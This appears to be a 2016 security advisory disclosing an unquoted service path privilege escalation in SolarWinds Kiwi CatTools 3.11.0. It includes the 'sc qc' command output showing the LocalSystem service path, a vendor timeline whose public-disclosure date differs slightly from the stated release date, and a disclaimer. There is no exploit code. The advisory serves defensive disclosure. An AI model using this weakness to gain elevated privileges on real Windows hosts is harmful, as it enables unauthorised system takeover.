SolarWinds Kiwi CatTools Unquoted Service Path Privilege Escalation Vulnerability
Author:
========
Halil Dalabasmaz
Release Date:
==============
29 SEP 2016
Product & Service Introduction:
================================
Kiwi CatTools saves you time by automating common network configuration
tasks including the ability to automatically change and backup network
device configurations. Kiwi CatTools is a software application used by
network administrators to automate many of the tasks they
perform on a daily basis. This is the no longer available freeware version.
Kiwi CatTools automates configuration backups and management on routers,
switches and firewalls. It provides e-mail notification and compare reports
highlighting config changes. Supports Telnet, SSH, TFTP and SNMP. Kiwi CatTools
is designed by network engineers, for network engineers. We understand the tasks
you need to perform and how you work. CatTools is here to make your life easier.
It does this by scheduling batch jobs,automating changes, and reporting on the
things that matter to you as a network administrator.
Vendor Homepage:
=================
http://www.kiwisyslog.com/products/kiwi-cattools/product-overview.aspx
Vulnerability Information:
===========================
The application can be install on Windows system as a service by default service
installation selected. The application a 32-bit application and the default
installation path is "C:\Program Files (x86)" on Windows systems. This could
potentially allow an authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. The application work on "Local System"
privileges. A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
C:\Windows\system32>sc qc CatTools
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: CatTools
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\CatTools_Service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CatTools
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Vulnerability Disclosure Timeline:
=========================
13 AUG 2016 - Contact With Vendor
15 AUG 2016 - Vendor Response
15 SEP 2016 - No Response From Vendor
19 SEP 2016 - Public Disclosure
Discovery Status:
==================
Published
Affected Product(s):
=====================
SolarWinds Kiwi CatTools 3.11.0
Tested On:
===========
Windows 7 Ultimate 64-Bit SP1 (EN)
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without
any warranty. BGA disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
Domain: www.bgasecurity.com
Social: twitter.com/bgasecurity
Contact: advisory@bga.com.tr
Copyright © 2016 | BGA Security LLC